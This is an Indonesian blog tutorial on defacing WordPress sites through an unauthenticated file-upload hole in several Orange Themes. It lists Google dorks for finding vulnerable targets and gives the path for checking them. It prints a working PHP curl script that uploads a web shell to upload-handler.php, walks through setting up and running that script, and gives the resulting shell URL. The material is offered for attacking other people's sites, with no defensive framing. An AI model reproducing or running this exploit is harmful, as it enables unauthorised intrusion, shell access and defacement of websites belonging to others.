Cara Deface dengan Exploit WP Orange Themes File Upload



deface, hacking,















Assalamualaikum , Kali ini saya dapat Kesempatan Untuk Membuat Tutor lagi :)

Alhamdulillah :D

Oke , tanpa basa-basi , langsung saja .

Pertama , Karena Judulnya orange themes File Upload , Maka ada beberapa Themes yang Sama Vuln dengan itu ,


  • inurl:"/wp-content/themes/bordeaux-theme/"
  • inurl:"/wp-content/themes/bulteno-theme/"
  • inurl:"/wp-content/themes/oxygen-theme/"
  • inurl:"/wp-content/themes/radial-theme/"
  • inurl:"/wp-content/themes/rayoflight-theme/"
  • inurl:"/wp-content/themes/reganto-theme/"
  • inurl:"/wp-content/themes/rockstar-theme/"  

 Sekarang , Gunakan 1 Dork Di atas .

Saya akan mengambil 1 Dork . 

Yaitu :inurl:"/wp-content/themes/bordeaux-theme/"

Lalu , Jika Sudah dapat kan target , ex: www.site.com/wp-content/themes/bordeux-theme/

Anda tambahkan Vuln nya , /functions/upload-handler.php

Maka targetnya akan menjadi www.site.com/wp-content/themes/bordeux-theme/functions/upload-handler.php

Jika Keluar Error maka Site Itu Vuln :D


nah Sebelum mengeksekusikan Target ini , yang anda butuh kan adalah :
  1. Xammp , Anda bisa download XAMMP di google, saya rasa sudah banyak bertebaran , lalu Install .
  2. Jika Sudah , Buka Folder Xammp > terus buka lagi Folder PHP , Dan cari code PHP.INI , Tekan Control + F / CTRL + F , Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda ; ini berarti kamu sudah succes ..
  3. Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php
Jika 3 cara diatas sudah selesai sekarang kita akan Mengeksekusikan Target ..

Copykan Exploit ini :


<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Dan Save dengan extention .php , Disini saya akan save dengan File bernama x.php , Simpan di dalam Folder Xammp >> PHP ..
Tepat dimana anda letak Shell anda tadi ..

Ingat , nama shell saya ada up.php 
Maka di bagian exploit tadi 


$uploadfile="upload.php"; <-- upload.php rename menjadi up.php 

Jika sudah Save Kembali :))

Sekarang .
 

Buka Xammp Anda , Disini Jika xammp anda termasuk Versi lama , maka anda harus masuk ke folder xammp nya langsung 

Cara nya 

ketik : cd\ Lalu tekan Enter 
 
Lalu Jika CMD anda kembali ke System C atau seperti ini
C:\Documents and Settings\Alliance>cd\

C:\>
Maka sudah berhasil , Sekarang selanjutnya tekan cd /xammp/php tekan Enter
 
Jika Sudah Jlankan Exploitnya , tadi nama Exploit saya adalah x.php maka cara menjalankannya seperti ini :
 
cd:\xammp\php\>: php x.php Dan tekan Enter ..
 
Jika Keluar tulisan nama shell anda di CMD atau Command Promd tadi maka SUCCES xD
Shell acces , www.site.com/wp-content/uploads/2013/11/up.php
 
Jika masih bingung , Kamu bisa Commentar di blog ini .
:)

0 Response to "Cara Deface dengan Exploit WP Orange Themes File Upload"

Posting Komentar